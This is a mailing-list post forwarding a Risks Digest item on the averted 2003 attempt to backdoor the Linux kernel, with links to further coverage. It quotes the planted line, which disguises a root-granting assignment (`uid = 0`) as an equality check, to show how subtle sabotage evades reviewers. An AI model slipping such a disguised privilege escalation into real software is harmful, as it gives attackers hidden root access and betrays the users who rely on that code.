Although this is not Mandrake related, I feel its worth posting the link to
the story. This was posted in the Risks Digest:
On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor into
Linux was averted. This is a really good example of the subtle kinds of
hacks a source code examiner must be waiting to catch if we want genuinely
secure voting systems under the current model of proprietary DRE systems
with a closed-door source code examination.
Someone broke into a server at kernel.kbits.net and inserted the following
code into the Linux kernel:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
For the complete story of this attack on Linux, including the actual E-mail
exchange documenting the discovery of the attack, see:
http://kerneltrap.org/node/view/1584
Linux: Kernel "Back Door" Attempt
This attack has only made the mainstream media in one place, so far:
http://www.smh.com.au/articles/2003/11/07/1068013371170.html
Bid to backdoor Linux kernel detected - smh.com.au
--
Regards
Chris
A 100% Microsoft free computer
Registered Linux User 283774 http://counter.li.org
9:16pm up 4 days, 11:22, 3 users, load average: 0.08, 0.05, 0.01
Want to buy your Pack or Services from MandrakeSoft?
Go to http://www.mandrakestore.com
